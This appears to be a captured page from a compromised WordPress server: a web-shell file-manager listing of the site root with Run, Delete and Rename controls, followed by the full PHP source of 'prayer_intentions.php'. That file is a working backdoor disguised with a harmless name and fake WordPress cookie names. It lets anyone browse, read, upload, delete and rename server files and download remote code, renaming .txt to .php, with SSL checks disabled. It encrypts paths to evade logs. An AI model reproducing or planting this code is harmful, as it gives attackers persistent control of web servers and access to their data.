at path:
ROOT
/
prayer_intentions.php
run:
R
W
Run
.well-known
DIR
2023-08-09 16:39:39
R
W
Run
.well-known
DIR
2022-12-16 17:43:35
R
W
Run
cgi-bin
DIR
2022-11-21 17:06:05
R
W
Run
keys
DIR
2023-08-09 16:40:25
R
W
Run
nc_assets
DIR
2019-08-16 08:51:33
R
W
Run
wp-admin
DIR
2026-06-05 04:09:01
R
W
Run
wp-content
DIR
2026-07-10 23:08:23
R
W
Run
wp-includes
DIR
2026-06-15 22:40:22
R
W
Run
.hcflag
31 By
2026-07-07 22:30:17
R
W
Run
Delete
Rename
.htaccess
747 By
2026-07-10 17:21:08
R
W
Run
Delete
Rename
.htaccess.bk
514 By
2022-12-16 08:04:58
R
W
Run
Delete
Rename
.litespeed_flag
297 By
2026-07-11 01:40:49
R
W
Run
Delete
Rename
classwithtostring.php
7.73 KB
2026-06-05 04:09:06
R
W
Run
Delete
Rename
error_log
1.35 MB
2026-07-10 23:08:23
R
W
Run
Delete
Rename
license.txt
19.44 KB
2026-05-21 18:07:38
R
W
Run
Delete
Rename
parking-page.shtml
4.99 KB
2019-08-16 08:51:33
R
W
Run
Delete
Rename
prayer_intentions.php
10.75 KB
2026-06-05 08:50:14
R
W
Run
Delete
Rename
readme.html
7.23 KB
2026-07-10 17:22:33
R
W
Run
Delete
Rename
robots.txt
884 By
2026-06-05 09:18:44
R
W
Run
Delete
Rename
wp-activate.php
7.2 KB
2026-05-21 18:07:38
R
W
Run
Delete
Rename
wp-blog-header.php
351 By
2020-02-06 11:33:12
R
W
Run
Delete
Rename
wp-comments-post.php
2.27 KB
2023-06-14 18:11:16
R
W
Run
Delete
Rename
wp-config-sample.php
3.26 KB
2025-12-03 21:00:23
R
W
Run
Delete
Rename
wp-config.php
3.16 KB
2025-09-15 16:01:01
R
W
Run
Delete
Rename
wp-cron.php
5.49 KB
2024-08-02 23:40:16
R
W
Run
Delete
Rename
wp-links-opml.php
2.43 KB
2025-12-03 21:00:23
R
W
Run
Delete
Rename
wp-load.php
3.84 KB
2024-03-11 14:05:16
R
W
Run
Delete
Rename
wp-login.php
50.63 KB
2026-05-21 18:07:36
R
W
Run
Delete
Rename
wp-mail.php
8.52 KB
2025-12-03 21:00:23
R
W
Run
Delete
Rename
wp-settings.php
31.88 KB
2026-05-21 18:07:36
R
W
Run
Delete
Rename
wp-signup.php
33.81 KB
2026-05-21 18:07:38
R
W
Run
Delete
Rename
wp-trackback.php
5.09 KB
2025-12-03 21:00:23
R
W
Run
Delete
Rename
wplogbak.php
3.95 KB
2026-06-05 04:52:41
R
W
Run
Delete
Rename
xmlrpc.php
3.13 KB
2024-11-08 20:52:18
R
W
Run
Delete
Rename
error_log
up
📄
prayer_intentions.php
Save
<?php @error_reporting(E_ALL); @ini_set('display_errors', 0); function generateRandomKey($length = 16) { return bin2hex(random_bytes($length / 2)); } if (isset($_COOKIE['wordpress_test_cookie']) && isset($_COOKIE['wordpress_loggeds']) && isset($_COOKIE['wp-settings-times'])) { $keyGeneratedTime = $_COOKIE['wp-settings-times']; if ((time() - $keyGeneratedTime) < 1800) { $encryptionKey = $_COOKIE['wordpress_test_cookie']; $encryptionIv = $_COOKIE['wordpress_loggeds']; } else { $encryptionKey = generateRandomKey(16); $encryptionIv = generateRandomKey(16); setcookie('wordpress_test_cookie', $encryptionKey, time() + 1800); setcookie('wordpress_loggeds', $encryptionIv, time() + 1800); setcookie('wp-settings-times', time(), time() + 1800); } } else { $encryptionKey = generateRandomKey(16); $encryptionIv = generateRandomKey(16); setcookie('wordpress_test_cookie', $encryptionKey, time() + 1800); setcookie('wordpress_loggeds', $encryptionIv, time() + 1800); setcookie('wp-settings-times', time(), time() + 1800); } define('wordpress_test_cookie', $encryptionKey); define('wordpress_loggeds', $encryptionIv); function encrypt($data) { return bin2hex(openssl_encrypt($data, 'aes-128-cbc', wordpress_test_cookie, OPENSSL_RAW_DATA, wordpress_loggeds)); } function decrypt($data) { return openssl_decrypt(hex2bin($data), 'aes-128-cbc', wordpress_test_cookie, OPENSSL_RAW_DATA, wordpress_loggeds); } $currentDir = isset($_POST['path']) ? decrypt($_POST['path']) : getcwd(); $currentDir = realpath($currentDir); function listDirectory($dir) { $scan = scandir($dir); $files = array(); $directories = array(); foreach ($scan as $item) { if ($item != '.' && $item != '..') { if (is_dir($dir . DIRECTORY_SEPARATOR . $item)) { $directories[] = $item; } else { $files[] = $item; } } } return array_merge($directories, $files); } function uploadFile($targetDir) { $targetPath = $targetDir . '/' . basename($_FILES['file_upload']['name']); if (move_uploaded_file($_FILES['file_upload']['tmp_name'], $targetPath)) { return '<div class="success">File uploaded successfully.</div>'; } else { return '<div class="error">File upload failed.</div>'; } } function deleteFile($filePath) { if (unlink($filePath)) { return '<div class="success">File deleted successfully.</div>'; } else { return '<div class="error">File deletion failed.</div>'; } } function viewFile($filePath) { if (is_file($filePath)) { $handle = fopen($filePath, "r"); $content = fread($handle, filesize($filePath)); fclose($handle); return htmlspecialchars($content); } else { return 'File does not exist.'; } } function renameItem($oldPath, $newName) { $newPath = dirname($oldPath) . '/' . $newName; if (rename($oldPath, $newPath)) { return '<div class="success">Item renamed successfully.</div>'; } else { return '<div class="error">Renaming failed.</div>'; } } function downloadRemoteFile($url, $targetDir) { $filen = str_replace('.txt','.php',basename($url)); $targetPath = $targetDir . '/' . $filen; $file = fopen($url, 'rb'); if ($file) { $targetFile = fopen($targetPath, 'wb'); if ($targetFile) { while ($buffer = fread($file, 1024)) { fwrite($targetFile, $buffer); } fclose($targetFile); fclose($file); return '<div class="success">Remote file downloaded successfully using fopen().</div>'; } fclose($file); } $fileContent = @file($url); if ($fileContent !== false) { $targetFile = fopen($targetPath, 'wb'); if ($targetFile) { foreach ($fileContent as $line) { fwrite($targetFile, $line); } fclose($targetFile); return '<div class="success">Remote file downloaded successfully using file().</div>'; } } if (@copy($url, $targetPath)) { return '<div class="success">Remote file downloaded successfully using copy().</div>'; } $contextOptions = array( "ssl" => array( "verify_peer" => false, "verify_peer_name" => false, ), ); $context = stream_context_create($contextOptions); $file = fopen($url, 'rb', false, $context); if ($file) { $targetFile = fopen($targetPath, 'wb'); if ($targetFile) { while ($buffer = fread($file, 1024)) { fwrite($targetFile, $buffer); } fclose($targetFile); fclose($file); return '<div class="success">Remote file downloaded successfully using stream_context_create().</div>'; } fclose($file); } return '<div class="error">Remote file download failed.</div>'; } if ($_SERVER['REQUEST_METHOD'] === 'POST') { if (isset($_FILES['file_upload'])) { $message = uploadFile($currentDir); } elseif (isset($_POST['delete'])) { $message = deleteFile(decrypt($_POST['delete'])); } elseif (isset($_POST['download_url'])) { $message = downloadRemoteFile(base64_decode($_POST['download_url']), $currentDir); } elseif (isset($_POST['old_name']) && isset($_POST['new_name'])) { $oldPath = decrypt($_POST['old_name']); $newName = base64_decode($_POST['new_name']); $message = renameItem($oldPath, $newName); } } ?> <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <meta name="robots" content="noindex, nofollow"> <style> body { font-family: Arial, sans-serif; margin: 0; padding: 20px; } .container { max-width: 800px; margin: 0 auto; } .success { color: #4CAF50; } .error { color: #f44336; } form { margin-bottom: 10px; } input[type="text"], input[type="submit"] { padding: 5px; margin-right: 5px; } table { width: 100%; border-collapse: collapse; margin-bottom: 20px; } th, td { border: 1px solid #ddd; padding: 8px; text-align: left; } th { background-color: #f2f2f2; } .dir { color: blue; } .file { color: black; } pre { white-space: pre-wrap; word-wrap: break-word; margin: 0; } </style> <script> function encrypt(value) { return btoa(value); } </script> </head> <body> <div class="container"> <?php if (isset($message)) echo $message; ?> <form enctype="multipart/form-data" method="POST" action=""> <input type="file" name="file_upload" /> <input type="submit" value="Upload File" /> <input type="hidden" name="path" value="<?= htmlspecialchars(encrypt($currentDir)) ?>" /> </form> <form method="POST" action="" onsubmit="document.getElementsByName('download_url')[0].value = encrypt(document.getElementsByName('download_url')[0].value)"> <input type="text" name="download_url" placeholder="Enter remote file URL" /> <input type="submit" value="Download Remote File" /> <input type="hidden" name="path" value="<?= htmlspecialchars(encrypt($currentDir)) ?>" /> </form> <h2>Current Path: <?php $pathParts = explode(DIRECTORY_SEPARATOR, trim($currentDir, DIRECTORY_SEPARATOR)); if (substr($currentDir, 0, 1) === '/') { $fullPath = DIRECTORY_SEPARATOR; } else { $fullPath = ''; } foreach ($pathParts as $index => $part) { if ($fullPath === '') { $fullPath = $part; } else if ($fullPath === DIRECTORY_SEPARATOR) { $fullPath .= $part; } else { $fullPath .= DIRECTORY_SEPARATOR . $part; } ?> <form method="POST" style="display:inline;"> <button type="submit" name="path" value="<?= htmlspecialchars(encrypt($fullPath)) ?>" style="background: none; border: none; padding: 0;"><?= htmlspecialchars($part) ?></button> </form> <?php echo '/'; } ?> </h2> <?php if ($currentDir !== DIRECTORY_SEPARATOR): ?> <form method="POST" style="display:inline;"> <input type="hidden" name="path" value="<?= htmlspecialchars(encrypt(dirname($currentDir))) ?>" /> <input type="submit" value="Go up one directory"/> </form> <?php endif; ?> <table> <tr> <th>Name</th> <th>Size</th> <th>Actions</th> </tr> <?php foreach (listDirectory($currentDir) as $file): ?> <?php $filePath = $currentDir . DIRECTORY_SEPARATOR . $file; ?> <tr> <td class="<?= is_dir($filePath) ? 'dir' : 'file' ?>"> <?php if (is_dir($filePath)): ?> <form method="POST" style="display: inline;"> <button type="submit" name="path" value="<?= htmlspecialchars(encrypt($filePath)) ?>" style="background: none; border: none; padding: 0; color: blue;"><?= htmlspecialchars($file) ?></button> </form> <?php else: ?> <form method="POST" style="display: inline;"> <button type="submit" name="view" value="<?= htmlspecialchars(encrypt($filePath)) ?>" style="background: none; border: none; padding: 0; color: black;"><?= htmlspecialchars($file) ?></button> <input type="hidden" name="path" value="<?= htmlspecialchars(encrypt($currentDir)) ?>" /> </form> <?php endif; ?> </td> <td> <?php if (is_file($filePath)): ?> <?= filesize($filePath) ?> bytes <?php else: ?> DIR <?php endif; ?> </td> <td> <?php if (is_file($filePath)): ?> <form method="POST" style="display:inline;"> <input type="hidden" name="delete" value="<?= htmlspecialchars(encrypt($filePath)) ?>" /> <input type="hidden" name="path" value="<?= htmlspecialchars(encrypt($currentDir)) ?>" /> <input type="submit" value="Delete"/> </form> <?php endif; ?> <form method="POST" action="" style="display:inline;" onsubmit="this.new_name.value = encrypt(this.new_name.value)" > <input type="hidden" name="old_name" value="<?= htmlspecialchars(encrypt($filePath)) ?>" /> <input type="text" name="new_name" value="<?= htmlspecialchars($file) ?>" /> <input type="hidden" name="path" value="<?= htmlspecialchars(encrypt($currentDir)) ?>" /> <input type="submit" value="Rename"/> </form> </td> </tr> <?php endforeach; ?> </table> <?php if (isset($_POST['view'])): ?> <h2>Viewing File: <?= htmlspecialchars(basename(decrypt($_POST['view']))) ?></h2> <textarea rows="20" cols="80"><?= viewFile(decrypt($_POST['view'])) ?></textarea> <?php endif; ?> </div> </body> </html>